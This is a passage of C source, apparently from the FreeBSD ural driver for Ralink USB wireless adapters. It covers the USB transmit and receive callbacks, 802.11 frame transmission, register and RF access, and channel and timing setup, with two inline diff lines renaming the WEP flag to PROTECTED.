ieee80211vap *vap; struct ural_tx_data *data; struct mbuf *m; struct usb_page_cache *pc; int len; usbd_xfer_status(xfer, &len, NULL, NULL, NULL); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: DPRINTFN(11, "transfer complete, %d bytes\n", len); /* free resources */ data = usbd_xfer_get_priv(xfer); ural_tx_free(data, 0); 
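/* The slot just went back on tx_free; clear the xfer's private pointer so the error path cannot pick up a stale pointer and free it a second time. */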
usbd_xfer_set_priv(xfer, NULL); ifp->if_opackets++; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: data = STAILQ_FIRST(&sc->tx_q); if (data) { STAILQ_REMOVE_HEAD(&sc->tx_q, next); m = data->m; if (m->m_pkthdr.len > (int)(RAL_FRAME_SIZE + RAL_TX_DESC_SIZE)) { DPRINTFN(0, "data overflow, %u bytes\n", m->m_pkthdr.len); m->m_pkthdr.len = (RAL_FRAME_SIZE + RAL_TX_DESC_SIZE); } pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_in(pc, 0, &data->desc, RAL_TX_DESC_SIZE); usbd_m_copy_in(pc, RAL_TX_DESC_SIZE, m, 0, m->m_pkthdr.len); vap = data->ni->ni_vap; if (ieee80211_radiotap_active_vap(vap)) { struct ural_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = data->rate; tap->wt_antenna = sc->tx_ant; ieee80211_radiotap_tx(vap, m); } /* xfer length needs to be a multiple of two! */ len = (RAL_TX_DESC_SIZE + m->m_pkthdr.len + 1) & ~1; if ((len % 64) == 0) len += 2; DPRINTFN(11, "sending frame len=%u xferlen=%u\n", m->m_pkthdr.len, len); usbd_xfer_set_frame_len(xfer, 0, len); usbd_xfer_set_priv(xfer, data); usbd_transfer_submit(xfer); } RAL_UNLOCK(sc); ural_start(ifp); RAL_LOCK(sc); break; default: /* Error */ DPRINTFN(11, "transfer error, %s\n", usbd_errstr(error)); ifp->if_oerrors++; data = usbd_xfer_get_priv(xfer); if (data != NULL) { ural_tx_free(data, error); usbd_xfer_set_priv(xfer, NULL); } if (error == USB_ERR_STALLED) { /* try to clear stall first */ usbd_xfer_set_stall(xfer); goto tr_setup; } if (error == USB_ERR_TIMEOUT) device_printf(sc->sc_dev, "device timeout\n"); break; } } static void ural_bulk_read_callback(struct usb_xfer *xfer, usb_error_t error) { struct ural_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_node *ni; struct mbuf *m = NULL; struct usb_page_cache *pc; uint32_t flags; int8_t rssi = 0, nf = 0; int len; usbd_xfer_status(xfer, &len, NULL, NULL, NULL); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: DPRINTFN(15, "rx done, actlen=%d\n", len); if (len < (int)(RAL_RX_DESC_SIZE + IEEE80211_MIN_LEN)) { DPRINTF("%s: xfer too short %d\n", device_get_nameunit(sc->sc_dev), len); ifp->if_ierrors++; goto tr_setup; } len -= RAL_RX_DESC_SIZE; /* rx descriptor is located at the end */ pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_out(pc, len, &sc->sc_rx_desc, RAL_RX_DESC_SIZE); rssi = URAL_RSSI(sc->sc_rx_desc.rssi); nf = RAL_NOISE_FLOOR; flags = le32toh(sc->sc_rx_desc.flags); if (flags & (RAL_RX_PHY_ERROR | RAL_RX_CRC_ERROR)) { /* * This should not happen since we did not * request to receive those frames when we * filled RAL_TXRX_CSR2: */ DPRINTFN(5, "PHY or CRC error\n"); ifp->if_ierrors++; goto tr_setup; } m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (m == NULL) { DPRINTF("could not allocate mbuf\n"); ifp->if_ierrors++; goto tr_setup; } usbd_copy_out(pc, 0, mtod(m, uint8_t *), len); /* finalize mbuf */ m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = (flags >> 16) & 0xfff; if (ieee80211_radiotap_active(ic)) { struct ural_rx_radiotap_header *tap = &sc->sc_rxtap; /* XXX set once */ tap->wr_flags = 0; tap->wr_rate = ieee80211_plcp2rate(sc->sc_rx_desc.rate, (flags & RAL_RX_OFDM) ? IEEE80211_T_OFDM : IEEE80211_T_CCK); tap->wr_antenna = sc->rx_ant; tap->wr_antsignal = nf + rssi; tap->wr_antnoise = nf; } /* Strip trailing 802.11 MAC FCS. 
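The chip hands up each received frame with its 4-byte FCS still attached; net80211 expects it to be removed, hence the m_adj() that follows.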
*/ m_adj(m, -IEEE80211_CRC_LEN); /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: usbd_xfer_set_frame_len(xfer, 0, usbd_xfer_max_len(xfer)); usbd_transfer_submit(xfer); /* * At the end of a USB callback it is always safe to unlock * the private mutex of a device! That is why we do the * "ieee80211_input" here, and not some lines up! */ RAL_UNLOCK(sc); if (m) { ni = ieee80211_find_rxnode(ic, mtod(m, struct ieee80211_frame_min *)); if (ni != NULL) { (void) ieee80211_input(ni, m, rssi, nf); ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi, nf); } if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0 && !IFQ_IS_EMPTY(&ifp->if_snd)) ural_start(ifp); RAL_LOCK(sc); return; default: /* Error */ if (error != USB_ERR_CANCELLED) { /* try to clear stall first */ usbd_xfer_set_stall(xfer); goto tr_setup; } return; } } static uint8_t ural_plcp_signal(int rate) { switch (rate) { /* OFDM rates (cf IEEE Std 802.11a-1999, pp. 14 Table 80) */ case 12: return 0xb; case 18: return 0xf; case 24: return 0xa; case 36: return 0xe; case 48: return 0x9; case 72: return 0xd; case 96: return 0x8; case 108: return 0xc; /* CCK rates (NB: not IEEE std, device-specific) */ case 2: return 0x0; case 4: return 0x1; case 11: return 0x2; case 22: return 0x3; } return 0xff; /* XXX unsupported/unknown rate */ } static void ural_setup_tx_desc(struct ural_softc *sc, struct ural_tx_desc *desc, uint32_t flags, int len, int rate) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t plcp_length; int remainder; desc->flags = htole32(flags); desc->flags |= htole32(RAL_TX_NEWSEQ); desc->flags |= htole32(len << 16); desc->wme = htole16(RAL_AIFSN(2) | RAL_LOGCWMIN(3) | RAL_LOGCWMAX(5)); desc->wme |= htole16(RAL_IVOFFSET(sizeof (struct ieee80211_frame))); /* setup PLCP fields */ desc->plcp_signal = ural_plcp_signal(rate); desc->plcp_service = 4; len += IEEE80211_CRC_LEN; if (ieee80211_rate2phytype(ic->ic_rt, rate) == IEEE80211_T_OFDM) { desc->flags |= htole32(RAL_TX_OFDM); plcp_length = len & 0xfff; desc->plcp_length_hi = plcp_length >> 6; desc->plcp_length_lo = plcp_length & 0x3f; } else { plcp_length = (16 * len + rate - 1) / rate; if (rate == 22) { remainder = (16 * len) % 22; if (remainder != 0 && remainder < 7) desc->plcp_service |= RAL_PLCP_LENGEXT; } desc->plcp_length_hi = plcp_length >> 8; desc->plcp_length_lo = plcp_length & 0xff; if (rate != 2 && (ic->ic_flags & IEEE80211_F_SHPREAMBLE)) desc->plcp_signal |= 0x08; } desc->iv = 0; desc->eiv = 0; } #define RAL_TX_TIMEOUT 5000 static int ural_tx_bcn(struct ural_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = sc->sc_ifp; const struct ieee80211_txparam *tp; struct ural_tx_data *data; if (sc->tx_nfree == 0) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; m_freem(m0); ieee80211_free_node(ni); return (EIO); } if (ic->ic_bsschan == IEEE80211_CHAN_ANYC) { m_freem(m0); ieee80211_free_node(ni); return (ENXIO); } data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_bsschan)]; data->m = m0; data->ni = ni; data->rate = tp->mgmtrate; ural_setup_tx_desc(sc, &data->desc, RAL_TX_IFS_NEWBACKOFF | RAL_TX_TIMESTAMP, m0->m_pkthdr.len, tp->mgmtrate); DPRINTFN(10, "sending beacon frame len=%u rate=%u\n", m0->m_pkthdr.len, tp->mgmtrate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[URAL_BULK_WR]); return (0); } static int ural_tx_mgt(struct ural_softc 
*sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; const struct ieee80211_txparam *tp; struct ural_tx_data *data; struct ieee80211_frame *wh; struct ieee80211_key *k; uint32_t flags; uint16_t dur; RAL_LOCK_ASSERT(sc, MA_OWNED); data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; wh = mtod(m0, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } wh = mtod(m0, struct ieee80211_frame *); } data->m = m0; data->ni = ni; data->rate = tp->mgmtrate; flags = 0; if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { flags |= RAL_TX_ACK; dur = ieee80211_ack_duration(ic->ic_rt, tp->mgmtrate, ic->ic_flags & IEEE80211_F_SHPREAMBLE); USETW(wh->i_dur, dur); /* tell hardware to add timestamp for probe responses */ if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_MGT && (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) == IEEE80211_FC0_SUBTYPE_PROBE_RESP) flags |= RAL_TX_TIMESTAMP; } ural_setup_tx_desc(sc, &data->desc, flags, m0->m_pkthdr.len, tp->mgmtrate); DPRINTFN(10, "sending mgt frame len=%u rate=%u\n", m0->m_pkthdr.len, tp->mgmtrate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[URAL_BULK_WR]); return 0; } static int ural_sendprot(struct ural_softc *sc, const struct mbuf *m, struct ieee80211_node *ni, int prot, int rate) { struct ieee80211com *ic = ni->ni_ic; const struct ieee80211_frame *wh; struct ural_tx_data *data; struct mbuf *mprot; int protrate, ackrate, pktlen, flags, isshort; uint16_t dur; KASSERT(prot == IEEE80211_PROT_RTSCTS || prot == IEEE80211_PROT_CTSONLY, ("protection %d", prot)); wh = mtod(m, const struct ieee80211_frame *); pktlen = m->m_pkthdr.len + IEEE80211_CRC_LEN; protrate = ieee80211_ctl_rate(ic->ic_rt, rate); ackrate = ieee80211_ack_rate(ic->ic_rt, rate); isshort = (ic->ic_flags & IEEE80211_F_SHPREAMBLE) != 0; dur = ieee80211_compute_duration(ic->ic_rt, pktlen, rate, isshort) + ieee80211_ack_duration(ic->ic_rt, rate, isshort); flags = RAL_TX_RETRY(7); if (prot == IEEE80211_PROT_RTSCTS) { /* NB: CTS is the same size as an ACK */ dur += ieee80211_ack_duration(ic->ic_rt, rate, isshort); flags |= RAL_TX_ACK; mprot = ieee80211_alloc_rts(ic, wh->i_addr1, wh->i_addr2, dur); } else { mprot = ieee80211_alloc_cts(ic, ni->ni_vap->iv_myaddr, dur); } if (mprot == NULL) { /* XXX stat + msg */ return ENOBUFS; } data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; data->m = mprot; data->ni = ieee80211_ref_node(ni); data->rate = protrate; ural_setup_tx_desc(sc, &data->desc, flags, mprot->m_pkthdr.len, protrate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[URAL_BULK_WR]); return 0; } static int ural_tx_raw(struct ural_softc *sc, struct mbuf *m0, struct ieee80211_node *ni, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ural_tx_data *data; uint32_t flags; int error; int rate; RAL_LOCK_ASSERT(sc, MA_OWNED); KASSERT(params != NULL, ("no raw xmit params")); rate = params->ibp_rate0; if (!ieee80211_isratevalid(ic->ic_rt, rate)) { m_freem(m0); return EINVAL; } flags = 0; if ((params->ibp_flags & IEEE80211_BPF_NOACK) == 0) flags |= RAL_TX_ACK; if (params->ibp_flags & (IEEE80211_BPF_RTS|IEEE80211_BPF_CTS)) { error = ural_sendprot(sc, m0, ni, 
params->ibp_flags & IEEE80211_BPF_RTS ? IEEE80211_PROT_RTSCTS : IEEE80211_PROT_CTSONLY, rate); if (error || sc->tx_nfree == 0) { m_freem(m0); return ENOBUFS; } flags |= RAL_TX_IFS_SIFS; } data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; data->m = m0; data->ni = ni; data->rate = rate; /* XXX need to setup descriptor ourself */ ural_setup_tx_desc(sc, &data->desc, flags, m0->m_pkthdr.len, rate); DPRINTFN(10, "sending raw frame len=%u rate=%u\n", m0->m_pkthdr.len, rate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[URAL_BULK_WR]); return 0; } static int ural_tx_data(struct ural_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ural_tx_data *data; struct ieee80211_frame *wh; const struct ieee80211_txparam *tp; struct ieee80211_key *k; uint32_t flags = 0; uint16_t dur; int error, rate; RAL_LOCK_ASSERT(sc, MA_OWNED); wh = mtod(m0, struct ieee80211_frame *); tp = &vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)]; if (IEEE80211_IS_MULTICAST(wh->i_addr1)) rate = tp->mcastrate; else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) rate = tp->ucastrate; else rate = ni->ni_txrate; - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { int prot = IEEE80211_PROT_NONE; if (m0->m_pkthdr.len + IEEE80211_CRC_LEN > vap->iv_rtsthreshold) prot = IEEE80211_PROT_RTSCTS; else if ((ic->ic_flags & IEEE80211_F_USEPROT) && ieee80211_rate2phytype(ic->ic_rt, rate) == IEEE80211_T_OFDM) prot = ic->ic_protmode; if (prot != IEEE80211_PROT_NONE) { error = ural_sendprot(sc, m0, ni, prot, rate); if (error || sc->tx_nfree == 0) { m_freem(m0); return ENOBUFS; } flags |= RAL_TX_IFS_SIFS; } } data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; data->m = m0; data->ni = ni; data->rate = rate; if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { flags |= RAL_TX_ACK; flags |= RAL_TX_RETRY(7); dur = ieee80211_ack_duration(ic->ic_rt, rate, ic->ic_flags & IEEE80211_F_SHPREAMBLE); USETW(wh->i_dur, dur); } ural_setup_tx_desc(sc, &data->desc, flags, m0->m_pkthdr.len, rate); DPRINTFN(10, "sending data frame len=%u rate=%u\n", m0->m_pkthdr.len, rate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[URAL_BULK_WR]); return 0; } static void ural_start(struct ifnet *ifp) { struct ural_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; RAL_LOCK(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { RAL_UNLOCK(sc); return; } for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; if (sc->tx_nfree < RAL_TX_MINFREE) { IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; if (ural_tx_data(sc, m, ni) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; break; } } RAL_UNLOCK(sc); } static int ural_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct ural_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error; int startall = 0; RAL_LOCK(sc); error = sc->sc_detached ? 
ENXIO : 0; RAL_UNLOCK(sc); if (error) return (error); switch (cmd) { case SIOCSIFFLAGS: RAL_LOCK(sc); if (ifp->if_flags & IFF_UP) { if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { ural_init_locked(sc); startall = 1; } else ural_setpromisc(sc); } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) ural_stop(sc); } RAL_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: case SIOCSIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; default: error = ether_ioctl(ifp, cmd, data); break; } return error; } static void ural_set_testmode(struct ural_softc *sc) { struct usb_device_request req; usb_error_t error; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = RAL_VENDOR_REQUEST; USETW(req.wValue, 4); USETW(req.wIndex, 1); USETW(req.wLength, 0); error = ural_do_request(sc, &req, NULL); if (error != 0) { device_printf(sc->sc_dev, "could not set test mode: %s\n", usbd_errstr(error)); } } static void ural_eeprom_read(struct ural_softc *sc, uint16_t addr, void *buf, int len) { struct usb_device_request req; usb_error_t error; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = RAL_READ_EEPROM; USETW(req.wValue, 0); USETW(req.wIndex, addr); USETW(req.wLength, len); error = ural_do_request(sc, &req, buf); if (error != 0) { device_printf(sc->sc_dev, "could not read EEPROM: %s\n", usbd_errstr(error)); } } static uint16_t ural_read(struct ural_softc *sc, uint16_t reg) { struct usb_device_request req; usb_error_t error; uint16_t val; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = RAL_READ_MAC; USETW(req.wValue, 0); USETW(req.wIndex, reg); USETW(req.wLength, sizeof (uint16_t)); error = ural_do_request(sc, &req, &val); if (error != 0) { device_printf(sc->sc_dev, "could not read MAC register: %s\n", usbd_errstr(error)); return 0; } return le16toh(val); } static void ural_read_multi(struct ural_softc *sc, uint16_t reg, void *buf, int len) { struct usb_device_request req; usb_error_t error; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = RAL_READ_MULTI_MAC; USETW(req.wValue, 0); USETW(req.wIndex, reg); USETW(req.wLength, len); error = ural_do_request(sc, &req, buf); if (error != 0) { device_printf(sc->sc_dev, "could not read MAC register: %s\n", usbd_errstr(error)); } } static void ural_write(struct ural_softc *sc, uint16_t reg, uint16_t val) { struct usb_device_request req; usb_error_t error; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = RAL_WRITE_MAC; USETW(req.wValue, val); USETW(req.wIndex, reg); USETW(req.wLength, 0); error = ural_do_request(sc, &req, NULL); if (error != 0) { device_printf(sc->sc_dev, "could not write MAC register: %s\n", usbd_errstr(error)); } } static void ural_write_multi(struct ural_softc *sc, uint16_t reg, void *buf, int len) { struct usb_device_request req; usb_error_t error; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = RAL_WRITE_MULTI_MAC; USETW(req.wValue, 0); USETW(req.wIndex, reg); USETW(req.wLength, len); error = ural_do_request(sc, &req, buf); if (error != 0) { device_printf(sc->sc_dev, "could not write MAC register: %s\n", usbd_errstr(error)); } } static void ural_bbp_write(struct ural_softc *sc, uint8_t reg, uint8_t val) { uint16_t tmp; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(ural_read(sc, RAL_PHY_CSR8) & RAL_BBP_BUSY)) break; if (ural_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to BBP\n"); return; } tmp = reg << 8 | val; ural_write(sc, RAL_PHY_CSR7, tmp); } static uint8_t ural_bbp_read(struct ural_softc 
*sc, uint8_t reg) { uint16_t val; int ntries; val = RAL_BBP_WRITE | reg << 8; ural_write(sc, RAL_PHY_CSR7, val); for (ntries = 0; ntries < 100; ntries++) { if (!(ural_read(sc, RAL_PHY_CSR8) & RAL_BBP_BUSY)) break; if (ural_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "could not read BBP\n"); return 0; } return ural_read(sc, RAL_PHY_CSR7) & 0xff; } static void ural_rf_write(struct ural_softc *sc, uint8_t reg, uint32_t val) { uint32_t tmp; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(ural_read(sc, RAL_PHY_CSR10) & RAL_RF_LOBUSY)) break; if (ural_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to RF\n"); return; } tmp = RAL_RF_BUSY | RAL_RF_20BIT | (val & 0xfffff) << 2 | (reg & 0x3); ural_write(sc, RAL_PHY_CSR9, tmp & 0xffff); ural_write(sc, RAL_PHY_CSR10, tmp >> 16); /* remember last written value in sc */ sc->rf_regs[reg] = val; DPRINTFN(15, "RF R[%u] <- 0x%05x\n", reg & 0x3, val & 0xfffff); } static void ural_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct ural_softc *sc = ifp->if_softc; RAL_LOCK(sc); ural_write(sc, RAL_TXRX_CSR19, 0); ural_set_bssid(sc, ifp->if_broadcastaddr); RAL_UNLOCK(sc); } static void ural_scan_end(struct ieee80211com *ic) { struct ural_softc *sc = ic->ic_ifp->if_softc; RAL_LOCK(sc); ural_enable_tsf_sync(sc); ural_set_bssid(sc, sc->sc_bssid); RAL_UNLOCK(sc); } static void ural_set_channel(struct ieee80211com *ic) { struct ural_softc *sc = ic->ic_ifp->if_softc; RAL_LOCK(sc); ural_set_chan(sc, ic->ic_curchan); RAL_UNLOCK(sc); } static void ural_set_chan(struct ural_softc *sc, struct ieee80211_channel *c) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint8_t power, tmp; int i, chan; chan = ieee80211_chan2ieee(ic, c); if (chan == 0 || chan == IEEE80211_CHAN_ANY) return; if (IEEE80211_IS_CHAN_2GHZ(c)) power = min(sc->txpow[chan - 1], 31); else power = 31; /* adjust txpower using ifconfig settings */ power -= (100 - ic->ic_txpowlimit) / 8; DPRINTFN(2, "setting channel to %u, txpower to %u\n", chan, power); switch (sc->rf_rev) { case RAL_RF_2522: ural_rf_write(sc, RAL_RF1, 0x00814); ural_rf_write(sc, RAL_RF2, ural_rf2522_r2[chan - 1]); ural_rf_write(sc, RAL_RF3, power << 7 | 0x00040); break; case RAL_RF_2523: ural_rf_write(sc, RAL_RF1, 0x08804); ural_rf_write(sc, RAL_RF2, ural_rf2523_r2[chan - 1]); ural_rf_write(sc, RAL_RF3, power << 7 | 0x38044); ural_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00280 : 0x00286); break; case RAL_RF_2524: ural_rf_write(sc, RAL_RF1, 0x0c808); ural_rf_write(sc, RAL_RF2, ural_rf2524_r2[chan - 1]); ural_rf_write(sc, RAL_RF3, power << 7 | 0x00040); ural_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00280 : 0x00286); break; case RAL_RF_2525: ural_rf_write(sc, RAL_RF1, 0x08808); ural_rf_write(sc, RAL_RF2, ural_rf2525_hi_r2[chan - 1]); ural_rf_write(sc, RAL_RF3, power << 7 | 0x18044); ural_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00280 : 0x00286); ural_rf_write(sc, RAL_RF1, 0x08808); ural_rf_write(sc, RAL_RF2, ural_rf2525_r2[chan - 1]); ural_rf_write(sc, RAL_RF3, power << 7 | 0x18044); ural_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00280 : 0x00286); break; case RAL_RF_2525E: ural_rf_write(sc, RAL_RF1, 0x08808); ural_rf_write(sc, RAL_RF2, ural_rf2525e_r2[chan - 1]); ural_rf_write(sc, RAL_RF3, power << 7 | 0x18044); ural_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00286 : 0x00282); break; case RAL_RF_2526: ural_rf_write(sc, RAL_RF2, ural_rf2526_hi_r2[chan - 1]); ural_rf_write(sc, RAL_RF4, (chan & 1) ? 
0x00386 : 0x00381); ural_rf_write(sc, RAL_RF1, 0x08804); ural_rf_write(sc, RAL_RF2, ural_rf2526_r2[chan - 1]); ural_rf_write(sc, RAL_RF3, power << 7 | 0x18044); ural_rf_write(sc, RAL_RF4, (chan & 1) ? 0x00386 : 0x00381); break; /* dual-band RF */ case RAL_RF_5222: for (i = 0; ural_rf5222[i].chan != chan; i++); ural_rf_write(sc, RAL_RF1, ural_rf5222[i].r1); ural_rf_write(sc, RAL_RF2, ural_rf5222[i].r2); ural_rf_write(sc, RAL_RF3, power << 7 | 0x00040); ural_rf_write(sc, RAL_RF4, ural_rf5222[i].r4); break; } if (ic->ic_opmode != IEEE80211_M_MONITOR && (ic->ic_flags & IEEE80211_F_SCAN) == 0) { /* set Japan filter bit for channel 14 */ tmp = ural_bbp_read(sc, 70); tmp &= ~RAL_JAPAN_FILTER; if (chan == 14) tmp |= RAL_JAPAN_FILTER; ural_bbp_write(sc, 70, tmp); /* clear CRC errors */ ural_read(sc, RAL_STA_CSR0); ural_pause(sc, hz / 100); ural_disable_rf_tune(sc); } /* XXX doesn't belong here */ /* update basic rate set */ ural_set_basicrates(sc, c); /* give the hardware some time to do the switchover */ ural_pause(sc, hz / 100); } /* * Disable RF auto-tuning. */ static void ural_disable_rf_tune(struct ural_softc *sc) { uint32_t tmp; if (sc->rf_rev != RAL_RF_2523) { tmp = sc->rf_regs[RAL_RF1] & ~RAL_RF1_AUTOTUNE; ural_rf_write(sc, RAL_RF1, tmp); } tmp = sc->rf_regs[RAL_RF3] & ~RAL_RF3_AUTOTUNE; ural_rf_write(sc, RAL_RF3, tmp); DPRINTFN(2, "disabling RF autotune\n"); } /* * Refer to IEEE Std 802.11-1999 pp. 123 for more information on TSF * synchronization. */ static void ural_enable_tsf_sync(struct ural_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); uint16_t logcwmin, preload, tmp; /* first, disable TSF synchronization */ ural_write(sc, RAL_TXRX_CSR19, 0); tmp = (16 * vap->iv_bss->ni_intval) << 4; ural_write(sc, RAL_TXRX_CSR18, tmp); logcwmin = (ic->ic_opmode == IEEE80211_M_IBSS) ? 2 : 0; preload = (ic->ic_opmode == IEEE80211_M_IBSS) ? 320 : 6; tmp = logcwmin << 12 | preload; ural_write(sc, RAL_TXRX_CSR20, tmp); /* finally, enable TSF synchronization */ tmp = RAL_ENABLE_TSF | RAL_ENABLE_TBCN; if (ic->ic_opmode == IEEE80211_M_STA) tmp |= RAL_ENABLE_TSF_SYNC(1); else tmp |= RAL_ENABLE_TSF_SYNC(2) | RAL_ENABLE_BEACON_GENERATOR; ural_write(sc, RAL_TXRX_CSR19, tmp); DPRINTF("enabling TSF synchronization\n"); } static void ural_enable_tsf(struct ural_softc *sc) { /* first, disable TSF synchronization */ ural_write(sc, RAL_TXRX_CSR19, 0); ural_write(sc, RAL_TXRX_CSR19, RAL_ENABLE_TSF | RAL_ENABLE_TSF_SYNC(2)); } #define RAL_RXTX_TURNAROUND 5 /* us */ static void ural_update_slot(struct ifnet *ifp) { struct ural_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; uint16_t slottime, sifs, eifs; slottime = (ic->ic_flags & IEEE80211_F_SHSLOT) ? 9 : 20; /* * These settings may sound a bit inconsistent but this is what the * reference driver does. 
*/ if (ic->ic_curmode == IEEE80211_MODE_11B) { sifs = 16 - RAL_RXTX_TURNAROUND; eifs = 364; } else { sifs = 10 - RAL_RXTX_TURNAROUND; eifs = 64; } ural_write(sc, RAL_MAC_CSR10, slottime); ural_write(sc, RAL_MAC_CSR11, sifs); ural_write(sc, RAL_MAC_CSR12, eifs); } static void ural_set_txpreamble(struct ural_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t tmp; tmp = ural_read(sc, RAL_TXRX_CSR10); tmp &= ~RAL_SHORT_PREAMBLE; if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) tmp |= RAL_SHORT_PREAMBLE; ural_write(sc, RAL_TXRX_CSR10, tmp); } static void ural_set_basicrates(struct ural_softc *sc, const struct ieee80211_channel *c) { /* XXX wrong, take from rate set */ /* update basic rate set */ if (IEEE80211_IS_CHAN_5GHZ(c)) { /* 11a basic rates: 6, 12, 24Mbps */ ural_write(sc, RAL_TXRX_CSR11, 0x150); } else if (IEEE80211_IS_CHAN_ANYG(c)) { /* 11g basic rates: 1, 2, 5.5, 11, 6, 12, 24Mbps */ ural_write(sc, RAL_TXRX_CSR11, 0x15f); } else { /* 11b basic rates: 1, 2Mbps */ ural_write(sc, RAL_TXRX_CSR11, 0x3); } } static void ural_set_bssid(struct ural_softc *sc, const uint8_t *bssid) { uint16_t tmp; tmp = bssid[0] | bssid[1] << 8; ural_write(sc, RAL_MAC_CSR5, tmp); tmp = bssid[2] | bssid[3] << 8; ural_write(sc, RAL_MAC_CSR6, tmp); tmp = bssid[4] | bssid[5] << 8; ural_write(sc, RAL_MAC_CSR7, tmp); DPRINTF("setting BSSID to %6D\n", bssid, ":"); } static void 